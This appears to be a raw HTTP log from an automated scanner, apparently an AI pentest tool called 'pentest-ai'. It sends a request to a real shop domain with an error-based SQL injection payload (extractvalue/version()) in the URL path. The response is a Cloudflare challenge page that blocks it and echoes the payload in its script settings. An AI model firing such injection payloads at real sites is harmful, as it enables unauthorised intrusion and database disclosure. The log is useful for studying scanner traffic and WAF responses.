REQUEST:
GET https://my.myfirst.tech//my.myfirst.tech/cdn/shop/t/1%27%20AND%20extractvalue%281%2Cconcat%280x7e%2Cversion%28%29%29%29--/assets/component-price.css
User-Agent: pentest-ai/0.11 (+https://pentestai.xyz)



RESPONSE:
HTTP 429
Date: Fri, 17 Jul 2026 09:39:25 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 9594
Connection: close
Accept-Ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Cf-Mitigated: challenge
X-Frame-Options: SAMEORIGIN
Server: cloudflare
Critical-Ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Cross-Origin-Embedder-Policy: require-corp
Cross-Origin-Opener-Policy: same-origin
Cross-Origin-Resource-Policy: same-origin
Origin-Agent-Cluster: ?1
Permissions-Policy: accelerometer=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=(),xr-spatial-tracking=*
Referrer-Policy: same-origin
Server-Timing: chlray;desc="a1c847818c6fa110"
X-Content-Type-Options: nosniff
Report-To: {"group":"cf-nel","max_age":604800,"endpoints":[{"url":"https://a.nel.cloudflare.com/report/v4?s=wIr5oSFoakgAODPEuvcqz1dr6mg3VYXD8mhNb%2F0EJNPVwHzuM5PS14vFAJjiaeugmyXucuYYv1h14P6vcD3rjG9lx%2BWJ07Wr0NPS2WoKka%2B%2Bmnkvw3f9J4e26wC9yYJXaA%3D%3D"}]}
Nel: {"report_to":"cf-nel","success_fraction":0.01,"max_age":604800}
X-XSS-Protection: 1; mode=block
X-Permitted-Cross-Domain-Policies: none
X-Download-Options: noopen
CF-RAY: a1c847818c6fa110-SIN
alt-svc: h3=":443"; ma=86400

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="utf-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <title>Verifying your connection...</title>

    <style type="text/css">
        *{box-sizing:border-box;margin:0;padding:0}html{font-family:"Helvetica Neue",Helvetica,Arial,sans-serif;background:#FFF;font-size:62.5%;color:#303030;min-height:100%}body{padding:0;margin:0;line-height:2.7rem}a{color:#303030;border-bottom:1px solid #303030;text-decoration:none;padding-bottom:1rem;transition:border-color 0.2s ease-in}svg{width:40%}a:hover{border-bottom-color:#A9A9A9}h1{font-weight:400;margin:0 0 1.4rem 0}p{font-size:1.5rem;margin:0}.page{padding:4rem 3.5rem;margin:0;display:flex;min-height:100vh;flex-direction:column}.text-container--main{flex:1;display:flex;align-items:start;margin-bottom:1.6rem;margin:auto}.action{border:1px solid #A9A9A9;padding:1.2rem 2.5rem;border-radius:6px;text-decoration:none;margin-top:1.6rem;display:inline-block;font-size:1.5rem;transition:border-color 0.2s ease-in}.action:hover{border-color:#000}@media all and (min-width:500px){.text-container--main{align-items:start}.page{padding:7.5rem 10.5rem}}
    </style>
<meta http-equiv="refresh" content="360"></head>

<body>
  <div class="page">
    <div class="text-container text-container--main">
      <div>
        <h1 data-i18n="content-title">Your connection needs to be verified before you can proceed</h1>
        <div class="cf-injected-html"><div class="main-wrapper" role="main"><div class="main-content"><noscript><div class="h2"><span id="challenge-error-text">Enable JavaScript and cookies to continue</span></div></noscript></div></div><script>(function(){window._cf_chl_opt = {cFPWv: 'b',cH: 'C8FDfBYZ_GqIkk5xCW2JgPSYi2gscyXKb2yxmMRFn1Q-1784281165-1.2.1.1-qJgv506Rl5cUwKQBkJv4AmjLAFMnj4px.E6WxsPqixVV4zFzzgyXPvtmYksggwGl',cITimeS: '1784281165',cRay: 'a1c847818c6fa110',cTplB: '0',cTplC:1,cTplO:0,cTplV:5,cType: 'managed',cUPMDTk:"/my.myfirst.tech/cdn/shop/t/1'%20AND%20extractvalue(1,concat(0x7e,version()))--/assets/component-price.css?__cf_chl_tk=1_aSW4zE5v_WiU6o2VfARhvO0Q1E_VjZ5c1G0_F.xmA-1784281165-1.0.1.1-LajlNotKwVanYr1WZ8B.341TD7oBeJ5zxNG7wM5uixM",cvId: '3',cZone: 'my.myfirst.tech',fa:"/my.myfirst.tech/cdn/shop/t/1'%20AND%20extractvalue(1,concat(0x7e,version()))--/assets/component-price.css?__cf_chl_f_tk=1_aSW4zE5v_WiU6o2VfARhvO0Q1E_VjZ5c1G0_F.xmA-1784281165-1.0.1.1-LajlNotKwVanYr1WZ8B.341TD7oBeJ5zxNG7wM5uixM",md: 'J1RUHxz6KWq5hqEaMK6T_ABvyJ2MdpgvU1AWHetyr0c-1784281165-1.2.1.1-9iunct7QZAOOgVG8dnVJghpmGEI3z.9YnZXF91nsu_2O5clgHocen2TyxMLfyxiliw5_4WACOHVdWacMide3GdPP0_lFZ7eREeO2bL28VV.cA1BBo6EWfiyIEzXYM3CmxsuHD.PoRofYHrvW_wYFOj5K1iKs.Jxl.LsyNdEM8uBeCbRL6uuQzwblvf5sbGYytiWI_xbYrmKgDuvKNpz5sZpyAWnKHaA.K9dO2_6tTP9pxAIwehgWt8RGBAvfRi2T.pYjL6Lw0YSQBuOOK9c_iwTB_LaSOc16jx.0Cl1BAlTSx58AsiDY9VZujioVjZTNjKuMkf9hs2OdnjVjCPYimnLe49iqr7Q9ty0qTBBtLpFFJNewFye8lj3hgzRP0OlSEAmEKdhg.5AjiMtsXSDqkgTV6P9YruMSK5EMrOhQ5x5umudZ7WZ13OjuwuHFdUezSL2ZDYRoDM.bOrdFreoXPa7m2y8RIdwNacg4FFFr_we4_8Ieqb95oya6F7SyJq9FD1Sgu_05x1rGoShOlKYxtq08hc5JdNTxEoPvq9JGDZAvnY_uvLhhXzc.GG8DCcQ8C1iLekoQTpNX30vu8mZoLmt4imjaxB0ZRRB.LTxbypwcn5e.g592GPyO9h0wrDPg8sEHfcDcr39Smr4csPwqMJl_7qZL7yk5lU0Q6aHFV1NqUbGpaJ8ZGFN2AJOy7TA3QDxc68T9pawun.Art66qwP5UhnMbfS0mO4fGWJD4uINh5zjH1CAF1FmMIGSHLamXFQyJ6dPf8PopQUpCs7k3F3qnLVqHwYLXRGpdmAlyVw4urjqgCGGR.7AWJbjjag0KEXCZs_C7Lb6ghRfOPXTri8mOf9IyGH0VgUCkw.ry6xukm6qrENuAnf0Or5fp0W2cpqVDo0ew2iiKzvBK70l80Jb29grqBcUMrtPQbSyTawFGjkVxAJDu07CoIGsb72kVX9U4TJOtUpAln66mx7c3lzEzohd_Ep.4lRHqU2IZrb8ODSKv5P4t91m4ncR0VqnmGurdE9U4oLYtHo7hAPUcjSiFDx4_dQFBocF5C9BQbcWO0rDVfBNo9zqW4ogIOqDxTKz6lFdJnneIIW0r3OqsM9eV9k5wxd5dsh_HRzuR110jne6CpppT2YbpqCXi4_gc6hjuWNEjrz5i.TFXev9yLvrvvOW1kATcdO7lRsE41gjhWlN.V_fdYODkCaWwDyyY0l55fxvaeWhXJY6pjS4YL6hRpNbdJhLO6Xyk1qrrunNtgCkjAjApqjq98NDEWshK',mdrd: 'TswXXO_noBPTTKqNjZAXUp1wqVVPldPWkSwvNJLWPgs-1784281165-1.2.1.1-D04f7HyhkUTpK6kb1Lpnkba1EPAQTPJpaZS1DfcaJB1M.a0a0o328S4_L3YHNyWEAhfmtHbgFswq5AEZwY6ejhn3mThGOeZ9df01st_hlDvaaTPqGGtesM7d.cFHh0875gq7e3CeI_CHjeI_uHQq9RFzn2Gt_OWi0SUBr3PmokcdkBWs7uBB62RwQrvmYxmNco7H4OgWgMviOeVrArFPx3dLnC0mdgC2AxxVcYw1l6hysOlX7iV6VpY9qdF_TZ51',};var a = document.createElement('script');a.src = '/cdn-cgi/challenge-platform/h/b/orchestrate/chl_page/v1?ray=a1c847818c6fa110';window._cf_chl_opt.cOgUHash = location.hash === '' && location.href.indexOf('#') !== -1 ? '#' : location.hash;window._cf_chl_opt.cOgUQuery = location.search === '' && location.href.slice(0, location.href.length - window._cf_chl_opt.cOgUHash.length).indexOf('?') !== -1 ? '?' : location.search;if (window.history && window.history.replaceState) {var ogU = location.pathname + window._cf_chl_opt.cOgUQuery + window._cf_chl_opt.cOgUHash;history.replaceState(null, null,"/my.myfirst.tech/cdn/shop/t/1'%20AND%20extractvalue(1,concat(0x7e,version()))--/assets/component-price.css?__cf_chl_rt_tk=1_aSW4zE5v_WiU6o2VfARhvO0Q1E_VjZ5c1G0_F.xmA-1784281165-1.0.1.1-LajlNotKwVanYr1WZ8B.341TD7oBeJ5zxNG7wM5uixM"+ window._cf_chl_opt.cOgUHash);a.onload = function() {history.replaceState(null, null, ogU);}}document.getElementsByTagName('head')[0].appendChild(a);}());</script></div>
      </div>
    </div>
  </div>

  <script>
    var t = {
  "cs": {
    "title": "Vaše připojení se ověřuje...",
    "content-title": "Než budete moct pokračovat, je nutné ověřit vaše připojení"
  },
  "da": {
    "title": "Bekræfter din forbindelse ...",
    "content-title": "Din forbindelse skal bekræftes, før du kan fortsætte"
  },
  "de": {
    "title": "Deine Verbindung wird verifiziert ...",
    "content-title": "Deine Verbindung muss verifiziert werden, bevor du fortfahren kannst"
  },
  "en": {
    "title": "Verifying your connection...",
    "content-title": "Your connection needs to be verified before you can proceed"
  },
  "es": {
    "title": "Verificando la conexión...",
    "content-title": "Se debe verificar tu conexión antes de poder continuar"
  },
  "fi": {
    "title": "Yhteyttäsi todennetaan...",
    "content-title": "Yhteytesi on todennettava ennen kuin voit jatkaa"
  },
  "fr": {
    "title": "Connexion en cours de vérification...",
    "content-title": "Votre connexion doit être vérifiée avant que vous puissiez continuer"
  },
  "hi": {
    "title": "आपका कनेक्शन वेरिफ़ाई हो रहा है...",
    "content-title": "इससे पहले कि आप आगे बढ़ें आपके कनेक्शन को वेरिफ़ाई करना होगा"
  },
  "it": {
    "title": "Verifica connessione...",
    "content-title": "È necessario verificare la tua connessione prima di procedere"
  },
  "ja": {
    "title": "接続を確認しています...",
    "content-title": "続行するには接続の確認が必要です"
  },
  "ko": {
    "title": "연결 확인 중...",
    "content-title": "계속 진행하려면 연결을 확인해야 합니다."
  },
  "ms": {
    "title": "Mengesahkan sambungan anda...",
    "content-title": "Sambungan anda perlu disahkan sebelum anda boleh meneruskan"
  },
  "nb": {
    "title": "Bekreft tilkoblingen din …",
    "content-title": "Tilkoblingen din må bekreftes før du kan fortsette"
  },
  "nl": {
    "title": "Je verbinding verifiëren...",
    "content-title": "Verifieer eerst je verbinding voordat je doorgaat"
  },
  "pl": {
    "title": "Weryfikowanie połączenia...",
    "content-title": "Możesz kontynuować, dopiero gdy połączenie zostanie zweryfikowane"
  },
  "pt-BR": {
    "title": "Verificando a conexão...",
    "content-title": "A conexão precisa ser verificada para você prosseguir"
  },
  "pt-PT": {
    "title": "A verificar a sua ligação...",
    "content-title": "A sua ligação tem de ser verificada antes de prosseguir"
  },
  "sv": {
    "title": "Verifierar din anslutning ...",
    "content-title": "Din anslutning måste verifieras innan du kan fortsätta"
  },
  "th": {
    "title": "ตรวจสอบยืนยันการเชื่อมต่อของคุณ...",
    "content-title": "การเชื่อมต่อของคุณต้องได้รับการตรวจสอบยืนยันก่อนจึงจะดำเนินการต่อได้"
  },
  "tr": {
    "title": "Bağlantınız doğrulanıyor...",
    "content-title": "Devam etmeden önce bağlantınızın doğrulanması gerekir."
  },
  "vi": {
    "title": "Đang xác minh kết nối...",
    "content-title": "Bạn cần xác minh kết nối để có thế tiếp tục"
  },
  "zh-CN": {
    "title": "正在验证您的连接...",
    "content-title": "您的连接需要经过验证然后您才能继续操作"
  },
  "zh-TW": {
    "title": "正在驗證連線...",
    "content-title": "您必須先驗證連線才能繼續"
  }
};
    var language = navigator.languages && navigator.languages[0] || // Chrome / Firefox
      navigator.language ||   // All browsers
      navigator.userLanguage || // IE <= 10
      "en";
    language = language.split("-")[0]; // Strip country code
    translations = t[language] || t["en"];
    // Replace content on screen
    for (var id in translations) {
      target = document.querySelector("[data-i18n=" + id + "]");
      if (target != undefined) {
        target.innerHTML = translations[id];
      }
    }
    // Replace title tage
    document.title = translations["title"];
    // Replace language tag
    if (t[language]) { document.getElementsByTagName('html')[0].setAttribute('lang', language); };
  </script>
</body>
</html>
